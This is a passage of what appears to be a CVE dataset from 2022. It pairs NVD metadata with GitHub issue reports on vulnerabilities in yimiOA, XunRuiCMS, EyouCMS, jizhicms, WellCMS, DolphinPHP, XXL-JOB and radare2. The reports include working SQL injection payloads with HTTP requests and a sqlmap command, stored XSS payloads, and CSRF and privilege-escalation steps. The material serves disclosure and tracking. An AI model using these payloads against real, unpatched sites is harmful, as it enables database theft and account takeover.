gzip, deflate Connection: close Content-Length: 2 ``` Found that the return here actually has a return, will prompt the SQL statement to report an error ![](https://uzjumakdown-1256190082.cos.ap-guangzhou.myqcloud.com/UzJuMarkDownImage20220722103656.png) Here we bring out the `user` directly with `extractvalue` ![](https://uzjumakdown-1256190082.cos.ap-guangzhou.myqcloud.com/UzJuMarkDownImage20220722103700.png) **POC** ```sql and+(extractvalue(1,concat(0x7e,(select+user()),0x7e)))--+ ``` **HTTP** ```http POST /oa/setup/checkPool?database=test'and+(extractvalue(1,concat(0x7e,(select+user()),0x7e)))--+ HTTP/1.1 Host: 172.16.140.186:8088 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: */* Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Content-Length: 2 ```
yimiYWOA<6.1 version foreground unauthorized SQL injection
https://api.github.com/repos/cloudwebsoft/ywoa/issues/25/comments
0
2022-07-22T02:52:22Z
2023-09-07T13:28:46Z
https://github.com/cloudwebsoft/ywoa/issues/25
1,314,075,554
25
4,012
CVE-2022-36224
2022-08-19T17:15:07.817
XunRuiCMS V4.5.6 is vulnerable to Cross Site Request Forgery (CSRF).
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/dayrui/xunruicms/issues/1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/dayrui/xunruicms/issues/1" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:xunruicms:xunruicms:4.5.6:*:*:*:*:*:*:*", "matchCriteriaId": "4E022B5A-17F8-4F5A-9154-747F0EDD4B6D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "352" ]
352
https://github.com/dayrui/xunruicms/issues/1
[ "Exploit", "Third Party Advisory" ]
github.com
[ "dayrui", "xunruicms" ]
本地搭建4.5.6版本 在后台,内容->文章管理->删除功能存在csrf ![image](https://user-images.githubusercontent.com/60609675/178884354-ff6acc56-38cf-43d8-9094-9fc715cef3ab.png) 选择一个内容进行删除操作,弹出框点击确认并抓包 ![image](https://user-images.githubusercontent.com/60609675/178884591-d6615fdb-6ba3-4cae-a998-45436c930f9e.png) 发送到csrf poc,并扔掉此包 ![image](https://user-images.githubusercontent.com/60609675/178884721-0812a508-24b7-4027-8cea-cb0a5b45b76e.png) ![image](https://user-images.githubusercontent.com/60609675/178884767-96f1786a-c63f-4120-bd06-32c5aeeb21cf.png) 访问csrf poc页面,点击按钮 ![image](https://user-images.githubusercontent.com/60609675/178884844-c9b5e5ea-670f-45dc-baf9-c789235c5771.png) ![image](https://user-images.githubusercontent.com/60609675/178884868-33d05f67-62f6-46e2-bdb0-04f3d6f9ec3e.png) 回显已经”所选内容已被放入回收站中“ 刷新页面 ,通过csrf删除的内容已不存在 ![image](https://user-images.githubusercontent.com/60609675/178885019-4c1b7606-eb8a-498e-8a02-d349ad0416c8.png)
XunRuiCMS-V4.5.6后台内容管理删除功能存在csrf
https://api.github.com/repos/dayrui/xunruicms/issues/1/comments
0
2022-07-14T02:29:11Z
2022-07-14T02:29:11Z
https://github.com/dayrui/xunruicms/issues/1
1,304,169,809
1
4,013
CVE-2022-36225
2022-08-19T17:15:07.897
EyouCMS V1.5.8-UTF8-SP1 is vulnerable to Cross Site Request Forgery (CSRF) via the background, column management function and add.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/weng-xianhu/eyoucms/issues/26" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/weng-xianhu/eyoucms/issues/26" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:eyoucms:eyoucms:1.5.8:*:*:*:*:*:*:*", "matchCriteriaId": "82E421EB-ECC8-42A4-8384-4187474D1AC3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "352" ]
352
https://github.com/weng-xianhu/eyoucms/issues/26
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "weng-xianhu", "eyoucms" ]
version:V1.5.8-UTF8-SP1 ![image](https://user-images.githubusercontent.com/60609675/179399541-843e2a44-61d4-47b1-a174-97e975e03452.png) In the background, column management function and add. ![image](https://user-images.githubusercontent.com/60609675/179399615-1abe143b-0165-43f6-8738-7d16c06c1637.png) Add test data and capture packets. ![image](https://user-images.githubusercontent.com/60609675/179399634-59449baa-e24e-4d7a-84e5-9ca0293f7e36.png) ![image](https://user-images.githubusercontent.com/60609675/179399670-c697287e-cb05-410c-8521-4f4e84783ff0.png) use CSRF poc,and drop the packets. ![image](https://user-images.githubusercontent.com/60609675/179399733-a6562ba4-8d4a-441d-8637-fe7f3a45e3fd.png) dorp the packets and submit. ![image](https://user-images.githubusercontent.com/60609675/179399776-e4475f20-9970-476b-9ac4-16d9b6436654.png) ![image](https://user-images.githubusercontent.com/60609675/179399794-2b8dc544-d6d7-43b5-b957-2e65bf0be254.png) See test added. ![image](https://user-images.githubusercontent.com/60609675/179399839-db85f945-909f-4282-a965-b71d70104902.png)
EyouCMS v1.5.8 has a vulnerability, Cross-site request forgery(CSRF)
https://api.github.com/repos/weng-xianhu/eyoucms/issues/26/comments
2
2022-07-17T13:08:03Z
2023-02-28T08:54:23Z
https://github.com/weng-xianhu/eyoucms/issues/26
1,307,093,003
26
4,014
CVE-2022-36577
2022-08-19T17:15:08.010
An issue was discovered in jizhicms v2.3.1. There is a CSRF vulnerability that can add a admin.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Cherry-toto/jizhicms/issues/77" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Cherry-toto/jizhicms/issues/77" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jizhicms:jizhicms:2.3.1:*:*:*:*:*:*:*", "matchCriteriaId": "F7444555-03D3-42CC-88CA-4BDE28C9CFC8", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "352" ]
352
https://github.com/Cherry-toto/jizhicms/issues/77
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "Cherry-toto", "jizhicms" ]
version:v2.3.1 ![image](https://user-images.githubusercontent.com/60609675/179764274-4b95effb-b33e-4508-ae85-77d1107f0f56.png) The issue in the background - > User Management - > administrator list ![image](https://user-images.githubusercontent.com/60609675/179764533-82a16b97-28a7-4689-9cab-fda210224a48.png) add a administrator and grab a package. ![image](https://user-images.githubusercontent.com/60609675/179764737-888bd574-8a1d-4eb2-8250-640826b59d7e.png) ![image](https://user-images.githubusercontent.com/60609675/179764770-dafd9ab6-4467-4850-be46-979007300ba2.png) use CSRF poc and drop the package. ![image](https://user-images.githubusercontent.com/60609675/179764919-de7716d6-6207-4aae-93fd-7ebe9b2b4f8f.png) ![image](https://user-images.githubusercontent.com/60609675/179765049-988c72b6-98e1-4a60-b6bb-f2b8ef91971e.png) submit ![image](https://user-images.githubusercontent.com/60609675/179765104-670dd49c-917f-47c8-9d06-ab16a6813226.png) ![image](https://user-images.githubusercontent.com/60609675/179765254-25bec4b9-98a8-4173-85d3-d86f2a0de5cc.png) Super administrator added successfully ![image](https://user-images.githubusercontent.com/60609675/179765347-54f1c98e-c220-4f05-ad71-38f1f3b69bc2.png)
jizhicms v2.3.1 has a vulnerability, Cross-site request forgery(CSRF)
https://api.github.com/repos/Cherry-toto/jizhicms/issues/77/comments
1
2022-07-19T13:44:25Z
2022-07-19T14:43:30Z
https://github.com/Cherry-toto/jizhicms/issues/77
1,309,547,815
77
4,015
CVE-2022-36578
2022-08-19T17:15:08.050
jizhicms v2.3.1 has SQL injection in the background.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/Cherry-toto/jizhicms/issues/78" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/Cherry-toto/jizhicms/issues/78" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jizhicms:jizhicms:2.3.1:*:*:*:*:*:*:*", "matchCriteriaId": "F7444555-03D3-42CC-88CA-4BDE28C9CFC8", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/Cherry-toto/jizhicms/issues/78
[ "Exploit", "Third Party Advisory" ]
github.com
[ "Cherry-toto", "jizhicms" ]
version: v2.3.1 Problematic packets: ``` POST /index.php/admins/Fields/get_fields.html HTTP/1.1 Host: 192.168.10.130 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:54.0) Gecko/20100101 Firefox/54.0 Accept: */* Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Referer: http://192.168.10.130/index.php/admins/Comment/editcomment/id/3.html Content-Length: 24 Cookie: language=en-gb; currency=USD; PHPSESSID=67c4b6e9ea40f3030a8987fcb94be158 Connection: close molds=comment&tid=0&id=3 ``` backstage->Interactive Management - > comment list, and grab a package ![image](https://user-images.githubusercontent.com/60609675/179772785-11dd848a-f80b-4ed7-bdaa-955b21f7a26e.png) ![image](https://user-images.githubusercontent.com/60609675/179772998-d9d64b4e-ad34-478a-9135-d972a9dbc64b.png) use sqlmap: sqlmap -r test.txt --level 3 --random-agent --batch ![image](https://user-images.githubusercontent.com/60609675/179773336-ea23c5e8-4344-4f63-b752-b92519539ffe.png) ``` --- Parameter: molds (POST) Type: stacked queries Title: MySQL >= 5.0.12 stacked queries (comment) Payload: molds=comment;SELECT SLEEP(5)#&tid=0&id=3 --- ```
jizhicms v2.3.1 has a vulnerability, SQL injection
https://api.github.com/repos/Cherry-toto/jizhicms/issues/78/comments
1
2022-07-19T14:21:25Z
2022-07-19T15:06:41Z
https://github.com/Cherry-toto/jizhicms/issues/78
1,309,598,383
78
4,016
CVE-2022-36579
2022-08-19T17:15:08.090
Wellcms 2.2.0 is vulnerable to Cross Site Request Forgery (CSRF).
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/wellcms/wellcms/issues/11" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/wellcms/wellcms/issues/11" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:wellcms:wellcms:2.2.0:*:*:*:*:*:*:*", "matchCriteriaId": "9D30FB54-27CB-4ADF-80A1-372F7BA7C082", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "352" ]
352
https://github.com/wellcms/wellcms/issues/11
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "wellcms", "wellcms" ]
version:2.2.0 position:Background - > manage users - > create users ![image](https://user-images.githubusercontent.com/60609675/180605647-be7b3ed5-4c69-4afb-813f-ef3c9f3925ad.png) ![image](https://user-images.githubusercontent.com/60609675/180605734-37112265-2247-448b-bacc-62a7f3579a10.png) add a new users, and grab a package. ![image](https://user-images.githubusercontent.com/60609675/180605776-351a6054-0fe9-45dd-9ae7-0c6b58f025f6.png) ![image](https://user-images.githubusercontent.com/60609675/180605785-f11e939c-6c22-4f49-aa68-de31cb1f7e26.png) use CSRF poc,and drop the package. ![image](https://user-images.githubusercontent.com/60609675/180605804-7b88acf0-0fc1-4e53-9e57-81e85a197005.png) ![image](https://user-images.githubusercontent.com/60609675/180605816-f27befd2-4808-400b-82e3-b83e70d5c847.png) submit request. ![image](https://user-images.githubusercontent.com/60609675/180605831-8ba8d995-2995-479b-83c1-3f283494a161.png) ![image](https://user-images.githubusercontent.com/60609675/180605855-1822d302-c9c5-40fb-a4f0-f702fdfa2125.png) success add a new user(administrator). ![image](https://user-images.githubusercontent.com/60609675/180605890-085168b8-eb1b-4d9f-8100-e3e8f2002f0a.png)
wellcms v2.2.0 has a vulnerability, Cross-site request forgery(CSRF)
https://api.github.com/repos/wellcms/wellcms/issues/11/comments
1
2022-07-23T12:56:19Z
2022-07-23T14:50:06Z
https://github.com/wellcms/wellcms/issues/11
1,315,652,867
11
4,017
CVE-2022-37254
2022-08-19T17:15:08.133
DolphinPHP 1.5.1 is vulnerable to Cross Site Scripting (XSS) via Background - > System - > system function - > configuration management.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/caiweiming/DolphinPHP/issues/42" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/caiweiming/DolphinPHP/issues/42" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:dolphinphp_project:dolphinphp:1.5.1:*:*:*:*:*:*:*", "matchCriteriaId": "6CF0D652-3247-4BBA-8070-026C39EBAEE1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/caiweiming/DolphinPHP/issues/42
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "caiweiming", "DolphinPHP" ]
version:1.5.1 Vulnerability location:Background - > System - > system function - > configuration management. ![image](https://user-images.githubusercontent.com/60609675/181787442-07219a03-0684-4a85-bf70-12b2adc1a203.png) ![image](https://user-images.githubusercontent.com/60609675/181788265-dd1faafa-a77d-4861-8ae3-8b142e4a33a8.png) Add a new configuration,and insert payload in the configuration title payload: `t"><img src=x onerror=alert(1)>` ![image](https://user-images.githubusercontent.com/60609675/181788501-5f348a12-b004-4608-9db1-974956a1c268.png) Save and refresh the page. Pop up window. ![image](https://user-images.githubusercontent.com/60609675/181788680-1a4df936-f04a-473d-bee2-35cea7938ba0.png) payload: `<img src=x onerror=alert("xss")>` ![image](https://user-images.githubusercontent.com/60609675/181789248-a9aa23fa-e1ed-4ee1-8154-81af18daa429.png) ![image](https://user-images.githubusercontent.com/60609675/181789321-239c4cae-d838-4ff0-a09d-011b1915ee47.png) When you visit this page, a pop-up window will pop up.
DolphinPHP v1.5.1 has a vulnerability, Stored Cross Site Scripting(XSS)
https://api.github.com/repos/caiweiming/DolphinPHP/issues/42/comments
1
2022-07-29T15:08:41Z
2024-07-10T09:50:07Z
https://github.com/caiweiming/DolphinPHP/issues/42
1,322,367,864
42
4,018
CVE-2022-36157
2022-08-19T22:15:09.017
XXL-JOB all versions as of 11 July 2022 are vulnerable to Insecure Permissions resulting in the ability to execute admin function with low Privilege account.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Richard-Muzi/vulnerability/issues/1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Richard-Muzi/vulnerability/issues/1" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:xuxueli:xxl-job:*:*:*:*:*:*:*:*", "matchCriteriaId": "B9117C48-ADBB-4018-8476-F291CA8A2BF4", "versionEndExcluding": null, "versionEndIncluding": "2.3.1", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "269" ]
269
https://github.com/Richard-Muzi/vulnerability/issues/1
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "Richard-Muzi", "vulnerability" ]
XXL-JOB is a distributed task scheduling framework, the core design goal is to develop quickly, learning simple, lightweight, easy to expand. Is now open source and access to a number of companies online product line. https://www.xuxueli.com/xxl-job/en/ https://github.com/xuxueli/xxl-job/ A Escalation of Privileges vulnerability was discoverde in the opensource CMS.OK,follow my step see how to achieve the vulnerability! 1、You need to login the system(default admin account:admin/123456),you'll see six functions. 2、Next,click the "user management(用户管理)"function and create a low Privilege user named test. 3、Logout the admin account and login with test account.we'll find there has only four functions. 4、If we add "/jobgroup" to the URL end ,we can see the fifth function "Executor management(执行器管理)",even edit it! So,we could achieve the vulnerability by four steps and execute admin function with low Privilege account.
XXL-JOB Escalation of Privileges vulnerability
https://api.github.com/repos/Richard-Muzi/vulnerability/issues/1/comments
0
2022-07-11T06:39:47Z
2022-07-11T07:59:53Z
https://github.com/Richard-Muzi/vulnerability/issues/1
1,300,276,528
1
4,019
CVE-2020-27793
2022-08-19T23:15:08.367
An off-by-one overflow flaw was found in radare2 due to mismatched array length in core_java.c. This could allow an attacker to cause a crash, and perform a denail of service attack.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "secalert@redhat.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/radareorg/radare2/commit/ced0223c7a1b3b5344af315715cd28fe7c0d9ebc" }, { "source": "secalert@redhat.com", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/radareorg/radare2/issues/16304" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/radareorg/radare2/commit/ced0223c7a1b3b5344af315715cd28fe7c0d9ebc" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/radareorg/radare2/issues/16304" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:radare:radare2:*:*:*:*:*:*:*:*", "matchCriteriaId": "EEE8DA49-FB7A-4416-8942-56DD67E62CD9", "versionEndExcluding": "4.4.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "193" ]
193
https://github.com/radareorg/radare2/issues/16304
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "radareorg", "radare2" ]
### Work environment | Questions | Answers |------------------------------------------------------|-------------------- | OS/arch/bits (mandatory) | Ubuntu x86 64 | File format of the file you reverse (mandatory) | ELF | Architecture/bits of the file (mandatory) | x86/64 | r2 -v full output, **not truncated** (mandatory) | rradare2 4.3.1 23909 @ linux-x86-64 git.4.3.1-1-ge55661b commit: e55661bd4c229b9095982675709bdd52e1b4c068 build: 2020-03-22__22:18:20 ### Expected behavior Handle input error ### Actual behavior seg fault ### Steps to reproduce the behavior $ r2 - [0x00000000]> java 0 Segmentation fault (core dumped) ### Additional Logs, screenshots, source-code, configuration dump, ... ![image](https://user-images.githubusercontent.com/20163299/77502165-0289f700-6e95-11ea-9e63-c1b0fa9d6039.png) in `core_java.c`, `END_CMDS` not match the actual length in `JAVA_CMDS`
unmatched array length in core_java.c
https://api.github.com/repos/radareorg/radare2/issues/16304/comments
1
2020-03-25T04:35:41Z
2020-03-26T11:02:44Z
https://github.com/radareorg/radare2/issues/16304
587,435,992
16,304
4,020
CVE-2020-27794
2022-08-19T23:15:08.427
A double free issue was discovered in radare2 in cmd_info.c:cmd_info(). Successful exploitation could lead to modification of unexpected memory locations and potentially causing a crash.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.1, "baseSeverity": "CRITICAL", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.2, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "secalert@redhat.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/radareorg/radare2/commit/cb8b683758edddae2d2f62e8e63a738c39f92683" }, { "source": "secalert@redhat.com", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/radareorg/radare2/issues/16303" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/radareorg/radare2/commit/cb8b683758edddae2d2f62e8e63a738c39f92683" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/radareorg/radare2/issues/16303" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:radare:radare2:*:*:*:*:*:*:*:*", "matchCriteriaId": "EEE8DA49-FB7A-4416-8942-56DD67E62CD9", "versionEndExcluding": "4.4.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "415" ]
415
https://github.com/radareorg/radare2/issues/16303
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "radareorg", "radare2" ]
### Work environment | Questions | Answers |------------------------------------------------------|-------------------- | OS/arch/bits (mandatory) | Ubuntu x86 64 | File format of the file you reverse (mandatory) | ELF | Architecture/bits of the file (mandatory) | x86/64 | r2 -v full output, **not truncated** (mandatory) | rradare2 4.3.1 23909 @ linux-x86-64 git.4.3.1-1-ge55661b commit: e55661bd4c229b9095982675709bdd52e1b4c068 build: 2020-03-22__22:18:20 ### Expected behavior Handle input error ### Actual behavior double free/invalid pointer to free ### Steps to reproduce the behavior $ r2 - [0x00000000]> in 0 [0x00000000]> oc 0 [0x00000000]> in 0 *** Error in `r2': free(): invalid pointer: 0x00007fffed1bcd00 *** …… ### Additional Logs, screenshots, source-code, configuration dump, ... ![image](https://user-images.githubusercontent.com/20163299/77501626-880ca780-6e93-11ea-8669-48362438f409.png) The `in` command would first free the original `core->table_query`, then create a new `core->table_query` in `cmd_info.c:cmd_info()`, ``` R_FREE (core->table_query); if (space && *space == ' ') { core->table_query = r_str_trim_dup (space + 1); } ``` The `oc` command would free it in `core.c: r_core_fini`, which didn't NULL it out. ``` …… free (c->table_query); r_list_free (c->files); r_list_free (c->watchers); r_list_free (c->scriptstack); …… ``` So execute `in 0` again would cause a double/invalid free.
invalid free in cmd_info.c:cmd_info()
https://api.github.com/repos/radareorg/radare2/issues/16303/comments
1
2020-03-25T04:31:50Z
2020-03-26T11:28:51Z
https://github.com/radareorg/radare2/issues/16303
587,434,855
16,303
4,021
CVE-2020-27795
2022-08-19T23:15:08.487
A segmentation fault was discovered in radare2 with adf command. In libr/core/cmd_anal.c, when command "adf" has no or wrong argument, anal_fcn_data (core, input + 1) --> RAnalFunction *fcn = r_anal_get_fcn_in (core->anal, core->offset, -1); returns null pointer for fcn causing segmentation fault later in ensure_fcn_range (fcn).
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
